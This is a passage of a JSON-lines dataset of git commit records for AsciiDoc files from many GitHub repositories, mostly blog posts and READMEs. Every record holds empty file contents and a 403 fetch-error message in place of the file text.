403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84b411a51205043aab7ee64e232ade3afae80ecd","subject":"Update 2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","message":"Update 2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","new_file":"_posts\/2014-11-05-E-quando-preciso-encontrar-uma-string-especifica-dentro-de-um-banco-mas-nao-sei-em-qual-tabela-nem-coluna.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"179663867f81cc917050d5a585b01e27890476d7","subject":"y2b create post Protocol Falcon Jet RC Helicopter Unboxing","message":"y2b create post Protocol Falcon Jet RC Helicopter Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-14-Protocol-Falcon-Jet-RC-Helicopter-Unboxing.adoc","new_file":"_posts\/2011-12-14-Protocol-Falcon-Jet-RC-Helicopter-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"804b33bdccffebbd495e2cfcdcafabd542cd557e","subject":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"567add70e29c4a717206ee6c821f7fd018f4f404","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a80d4016a026b7d8b8296f6ef75ed52b159f08b","subject":"Update 2017-06-23-This-is-just-a-test-blog-post.adoc","message":"Update 
2017-06-23-This-is-just-a-test-blog-post.adoc","repos":"marioandres\/marioandres.github.io,marioandres\/marioandres.github.io,marioandres\/marioandres.github.io,marioandres\/marioandres.github.io","old_file":"_posts\/2017-06-23-This-is-just-a-test-blog-post.adoc","new_file":"_posts\/2017-06-23-This-is-just-a-test-blog-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marioandres\/marioandres.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"400784e98f14350399b8cb7a0aa6e3f889e136cb","subject":"Update 2015-02-11-.adoc","message":"Update 2015-02-11-.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-11-.adoc","new_file":"_posts\/2015-02-11-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26fd48219de898ec2f77eb68b174595f758f911b","subject":"Update 2015-08-26-BattleBots-is-Back.adoc","message":"Update 2015-08-26-BattleBots-is-Back.adoc","repos":"MattBlog\/mattblog.github.io,MattBlog\/mattblog.github.io,MattBlog\/mattblog.github.io","old_file":"_posts\/2015-08-26-BattleBots-is-Back.adoc","new_file":"_posts\/2015-08-26-BattleBots-is-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MattBlog\/mattblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11cbadaa4f5aa30c5052bdb60598f8cd768c0dc8","subject":"Update 2015-11-23-Deceived-by-Charms.adoc","message":"Update 2015-11-23-Deceived-by-Charms.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce06f116282503109829e220535f2b5df9fb3ace","subject":"Update 2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","message":"Update 2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","new_file":"_posts\/2016-08-29-Moving-from-Spain-to-the-Netherlands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8ecb6e3d844864de7ef781163a5fa503dbedba2","subject":"y2b create post The Wireless Future They Promised Us...","message":"y2b create post The Wireless Future They Promised Us...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-05-The-Wireless-Future-They-Promised-Us.adoc","new_file":"_posts\/2016-08-05-The-Wireless-Future-They-Promised-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"595af7cdfb6b5e3c2d8adcd74ffb97032bae4ff3","subject":"docs: add 1.5.0 release note for thread count reduction","message":"docs: add 1.5.0 release note for thread count reduction\n\nChange-Id: I06939f0e01db780f86a7da16e92e5acd188b6925\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7905\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\nTested-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff25bf8c66fb13f507180eafced6f9dbfacdf1f9","subject":"Initial revision.","message":"Initial revision.\n","repos":"project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip,nestlabs\/connectedhomeip,nestlabs\/connectedhomeip,project-chip\/connectedhomeip","old_file":"docs\/style\/DOXYGEN.adoc","new_file":"docs\/style\/DOXYGEN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/project-chip\/connectedhomeip.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb4f5719273cd0592196d99581dce98fcea2fb6","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/httpie-request.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/httpie-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2e89b404ecbe8e02b853f9ebba310afa37164ed","subject":"new poem","message":"new poem","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/poems\/trust.adoc","new_file":"content\/poems\/trust.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"28ebe9df120ad876e7298e6547de158a4563eff7","subject":"README","message":"README\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Graded 
exercices.adoc","new_file":"Git\/Graded exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a42249b34d341a92fa250037151b4b35dbbff606","subject":"Update 2016-05-26-Kafka.adoc","message":"Update 2016-05-26-Kafka.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-26-Kafka.adoc","new_file":"_posts\/2016-05-26-Kafka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"00101372d017aac8918910dee5386e7710bb0f62","subject":"README: The beginnings of a README","message":"README: The beginnings of a README\n","repos":"josh-berry\/homectl,josh-berry\/homectl","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josh-berry\/homectl.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8b4434a89bc89eb1a2b13adfedac41f962ae5d6b","subject":"y2b create post 13\\","message":"y2b create post 13\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-10-28-13.adoc","new_file":"_posts\/2012-10-28-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8d5d2364e8ab964eb1da636344a6a96948e888d8","subject":"Update 2017-02-21-30.adoc","message":"Update 2017-02-21-30.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-30.adoc","new_file":"_posts\/2017-02-21-30.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f6e8e22aa99afc5f9dc0b3d59fa5c224d8997dfc","subject":"y2b create post Dyson Air Multiplier Unboxing \\u0026 Overview","message":"y2b create post Dyson Air Multiplier Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-25-Dyson-Air-Multiplier-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-04-25-Dyson-Air-Multiplier-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f37650ca447b6441cf7b7aec18ffaba28df2d5e0","subject":"Update 2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","message":"Update 2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_file":"_posts\/2016-03-26-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d2d5c941ca162b2e62f95edc50d76145d40b95db","subject":"git commands","message":"git commands\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"practical_git.adoc","new_file":"practical_git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"}
{"commit":"2060a1151d9a426ba1ec079a365f1a771a1c478f","subject":"Update 2017-05-26-Pattern-matching-in-haskell.adoc","message":"Update 2017-05-26-Pattern-matching-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-26-Pattern-matching-in-haskell.adoc","new_file":"_posts\/2017-05-26-Pattern-matching-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3ee22ebc84d18cecbe399174c752b0737cadc109","subject":"Add beginning of instructions","message":"Add beginning of instructions\n","repos":"judcon\/mobile_and_push","old_file":"INSTRUCTIONS.asciidoc","new_file":"INSTRUCTIONS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/judcon\/mobile_and_push.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"9d8c9d56746de63b9a7610d7e4095e07e825ff6f","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"eef5f7773f36a8d9d84e6ee7f518d155ed179af2","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9c0e49724d519f34cec8d5ac582ee53949e54385","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ef6411e7c7a586c8f935c2a9dda4e99050a6cadd","subject":"Create BL readme","message":"Create BL readme","repos":"mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh","old_file":"nRF51\/bootloader\/README.adoc","new_file":"nRF51\/bootloader\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"}
{"commit":"ba6ad1eff3211655dda571682cc5b298c8d18f29","subject":"y2b create post Samsung Galaxy S4 Unboxing (Galaxy S IV)","message":"y2b create post Samsung Galaxy S4 Unboxing (Galaxy S IV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-02-Samsung-Galaxy-S4-Unboxing-Galaxy-S-IV.adoc","new_file":"_posts\/2013-05-02-Samsung-Galaxy-S4-Unboxing-Galaxy-S-IV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"41e8f2ac7a9b805215bf626e106c99c1f3136dee","subject":"Update 2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","message":"Update 2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","new_file":"_posts\/2016-09-08-Rhizosphere-metatranscriptome-analysis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"197e8b43b19c80730030b3ed41b79bb0f51c22a5","subject":"y2b create post Designing My Own iPhone 8 From Scratch!","message":"y2b create post Designing My Own iPhone 8 From Scratch!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-30-Designing-My-Own-iPhone-8-From-Scratch.adoc","new_file":"_posts\/2017-07-30-Designing-My-Own-iPhone-8-From-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6560bb7dcaf30331690a2941f3051e032fe0bcd9","subject":"Document the new forceLocal property on BrowserStackExtension.","message":"Document the new forceLocal property on BrowserStackExtension.\n\nFixes geb\/issues#385\n","repos":"pierre-hilt\/geb,menonvarun\/geb,menonvarun\/geb,madmas\/geb,onBass-naga\/geb,madmas\/geb,menonvarun\/geb,onBass-naga\/geb,pierre-hilt\/geb,ntotomanov-taulia\/geb,geb\/geb,pierre-hilt\/geb,geb\/geb,madmas\/geb,ntotomanov-taulia\/geb","old_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madmas\/geb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"af030e6221b1c3936f8f30d9fa97c474dd918aea","subject":"Update 2015-09-08-Courseras-Data-Science-Specialization.adoc","message":"Update 2015-09-08-Courseras-Data-Science-Specialization.adoc","repos":"sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io","old_file":"_posts\/2015-09-08-Courseras-Data-Science-Specialization.adoc","new_file":"_posts\/2015-09-08-Courseras-Data-Science-Specialization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sumit1sen\/sumit1sen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"179ca19aee5d169c5c1c336be38e6def511686ef","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"099a2dedc8a9348ac82b0008b77c006bcb95f3ec","subject":"Create 220.adoc","message":"Create 220.adoc","repos":"camunda\/camunda-spring-boot-starter,camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/changelog\/220.adoc","new_file":"docs\/src\/main\/asciidoc\/changelog\/220.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"2a1b763a2e2007937dba0c5851a3cbf3abd67146","subject":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","message":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a1211b0531b4f95a9b5aeb8808e27f1d6032fe09","subject":"Custom URL parser blog","message":"Custom URL parser blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-07-03-custom-url-parser.adoc","new_file":"_blog-src\/_posts\/2018-07-03-custom-url-parser.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"7f4302466eb0df6538ae0fce6696067588ab9ab5","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2c207c9cf0aa3a6f5708df68c9d68846f3bf3111","subject":"Update 2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","message":"Update 2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","new_file":"_posts\/2016-04-25-Eat-free-at-Disney-World-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c749110794be66b8dc3c5cad7e731778fcefa6a2","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0d48513d524d445d777cd668398de3f5e7c8a4b6","subject":"Update 2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","message":"Update 2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","new_file":"_posts\/2017-01-31-Episode-86-From-Meatballs-to-Mods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"48c40ac5f74c384989f2080e998076acff0a40b6","subject":"Update 2018-08-12-Prepare-for-Mobile-First-Index.adoc","message":"Update 2018-08-12-Prepare-for-Mobile-First-Index.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-12-Prepare-for-Mobile-First-Index.adoc","new_file":"_posts\/2018-08-12-Prepare-for-Mobile-First-Index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7590f09560ba53b3b56b75628b8da7800ed15aa7","subject":"Update 2015-02-09-First-Post.adoc","message":"Update 2015-02-09-First-Post.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-02-09-First-Post.adoc","new_file":"_posts\/2015-02-09-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3b94325a55711a776ef0e59bbd358f59595031a6","subject":"Update 2016-12-23-First-post.adoc","message":"Update 2016-12-23-First-post.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2016-12-23-First-post.adoc","new_file":"_posts\/2016-12-23-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
